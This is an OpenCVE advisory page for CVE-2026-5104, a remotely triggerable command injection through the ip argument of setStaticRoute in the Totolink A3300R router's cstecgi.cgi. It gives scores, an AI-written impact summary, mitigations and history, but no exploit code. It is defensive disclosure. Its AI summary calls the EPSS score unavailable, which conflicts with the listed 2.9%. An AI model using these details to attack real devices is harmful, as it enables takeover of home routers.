Description
A security vulnerability has been detected in Totolink A3300R 17.0.0cu.557_b20221024. Impacted is the function setStaticRoute of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument ip leads to command injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.
Published: 2026-03-30
Score: 5.3 Medium
EPSS: 2.9% Low
KEV: No
Impact: Command Injection
Action: Immediate Patch
AI Analysis

Impact

A flaw in the setStaticRoute function of /cgi-bin/cstecgi.cgi allows an attacker to craft an input that is not properly sanitized. When the ip argument is manipulated, the router executes arbitrary shell commands supplied by the attacker. This leads to control over the router via remote command execution, potentially allowing full compromise of the device's firmware.

Affected Systems

Totolink A3300R routers running firmware version 17.0.0cu.557_b20221024 are vulnerable. The issue resides in the web management interface of the cstecgi.cgi script.

Risk and Exploitability

The CVSS score of 5.3 indicates medium severity, and the EPSS score is unavailable. The vulnerability is not listed in the CISA KEV catalog, yet the exploit has been publicly disclosed and can be triggered remotely by sending a crafted HTTP request to the cstecgi.cgi endpoint. Only network availability of the device is required for exploitation. Given the moderate score and public availability, the risk is considered significant for exposed devices.

Generated by OpenCVE AI on March 30, 2026 at 05:50 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the router firmware to a version that resolves the command injection flaw, if one is available on the manufacturer's site.
  • If no patch exists, block remote access to the /cgi-bin/cstecgi.cgi endpoint or the entire web management interface using firewall or ACL rules.
  • Continuously monitor system logs for attempts to invoke cstecgi.cgi or evidence of unexpected command execution.

Generated by OpenCVE AI on March 30, 2026 at 05:50 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 30 Mar 2026 15:45:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:h:totolink:a3300r:-:*:*:*:*:*:*:*
cpe:2.3:o:totolink:a3300r_firmware:17.0.0cu.557_b20221024:*:*:*:*:*:*:*

Mon, 30 Mar 2026 07:15:00 +0000

Type Values Removed Values Added
First Time appeared Totolink a3300r
Vendors & Products Totolink a3300r

Mon, 30 Mar 2026 03:30:00 +0000

Type Values Removed Values Added
Description A security vulnerability has been detected in Totolink A3300R 17.0.0cu.557_b20221024. Impacted is the function setStaticRoute of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument ip leads to command injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.
Title Totolink A3300R cstecgi.cgi setStaticRoute command injection
First Time appeared Totolink
Totolink a3300r Firmware
Weaknesses CWE-74
CWE-77
CPEs cpe:2.3:o:totolink:a3300r_firmware:*:*:*:*:*:*:*:*
Vendors & Products Totolink
Totolink a3300r Firmware
References
Metrics cvssV2_0

{'score': 6.5, 'vector': 'AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR'}

cvssV3_0

{'score': 6.3, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R'}

cvssV3_1

{'score': 6.3, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R'}

cvssV4_0

{'score': 5.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P'}

Subscriptions

Totolink A3300r A3300r Firmware
cve-icon MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-03-30T02:00:15.646Z

Reserved: 2026-03-29T17:50:53.126Z

Link: CVE-2026-5104

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Analyzed

Published: 2026-03-30T03:15:58.187

Modified: 2026-03-30T15:41:52.153

Link: CVE-2026-5104

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-03-30T07:03:44Z

Weaknesses